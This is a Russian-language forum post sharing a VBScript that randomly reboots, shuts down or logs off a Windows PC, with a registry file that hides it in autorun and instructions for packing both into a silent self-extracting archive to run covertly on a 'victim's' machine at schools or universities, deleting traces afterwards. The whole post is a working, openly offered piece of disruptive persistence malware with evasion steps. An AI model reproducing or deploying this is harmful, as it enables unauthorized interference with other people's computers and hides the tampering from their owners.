st.jimmy.art
Сообщений: 6
Оценки: 0
Присоединился: 2007-12-23 22:51:35.963333
|
хочу поделиться одним баянчиком, который может и известен давно в широких кругах, но все же - повторения - это мать учения.
штучка небольшая, но коварная, поможет потрепать нервы админам в школах и универах.
итак…
как то серфя интернеты, наткнулся на vbscript, отключающий машину через время, задданное юзером. пришла идея, воплотил. покопался в коде, выкинул ненужное, добавил отсебятины, итого получил это:
Option Explicit
Dim oWMI, oOS, obj
Randomize Timer
On Error Resume Next
Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate,(Shutdown)}!\\.\root\cimv2")
On Error GoTo 0
For Each obj in oWMI.ExecQuery("Select * from Win32_OperatingSystem")
Set oOS = obj
Exit For
Next
WScript.Sleep SetTimer()
ShutDownNow
Function SetTimer()
Randomize Timer
dim timerr
timerr = int(rnd * 120)
SetTimer =1000 * timerr
End Function
Sub ShutDownNow()
Const EWX_LOGOFF = 0
Const EWX_SHUTDOWN = 1
Const EWX_REBOOT = 2
Const EWX_FORCE = 4
Const EWX_POWEROFF = 8
dim shrand
shrand = int(rnd * 3) + 1
select case shrand
case 1
oOS.Win32shutdown EWX_REBOOT
case 2
oOS.Win32shutdown EWX_SHUTDOWN
case 3
oOS.Win32shutdown EWX_LOGOFF
case else
oOS.Win32shutdown EWX_SHUTDOWN
end select
End Sub
пишем этот код в блокноте, сохраняем как winexpx.vbs например и получаем рабочий скрипт. скрипт сей при запуске включает рандом-машину, которая выбирает время(от 1 до 120 секунд), через которое произведется действие, и само действие, т.е. перезагрузку, шатдаун компа или отлогинивание.
естественно, прописав такой скрипт на автозагрузку на чужой машине, мы поймаем много лулзов (главное, чтоб не люлей, тут надо быть очень внимательным)
чтоб прописать этот файлик в автозагрузку, можно воспользоваться готовым *.reg-файлом:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"winexp"="C:\\WINDOWS\\SYSTEM32\\winexpx.vbs" синтаксис reg-файлов очень капризен, иногда и лишний пробел может пустить все коту под хвост, поэтому советую ознакомиться с ним в соответствующих статьях, которые без труда можно найти в интернетах.
этот reg-фаил (пусть будет hack.reg) пропишет в автозагрузку наш скрипт, предварительно внесенный на чужую машину в самую сакральную папку, да так, что просто нубо-юзер чрез msconfig не сможет его пронюхать.
осталось только внести нужные файлы куда следует и подредактировать реестр
для этого воспользуемся старым добрым winrar'ом с его sfx-архивами
засовываем в sfx-архив наши winexpx.vbs и hack.reg, лезем в Параметры SFX:
1. вкладка Общие - Путь для распаковки - "C:\WINDOWS\SYSTEM32\"
2. вкладка Общие - Выполнить после распаковки - "regedit /s hack.reg" - внесет в реестр жертвы строку, да еще и без запроса (однако касперский или другие антивири могут сигнализировать)
3. вкладка Дополнительные - Файлы, удаляемые в папке назначения - "hack.reg" - на всякий пожарный заметаем следы
4. вкладка Режимы - точка напротив "Скрыть всё"
архивируем и каким либо образов запускаем на машине жертвы (самый легкий способ - пронести на флешке и беспалевно запустить, делов там на 5 секунд). после перезагрузки начнется свистопляска.
вот и все, ловите лулзы ;)
|
ловим лулзы над нубами - 
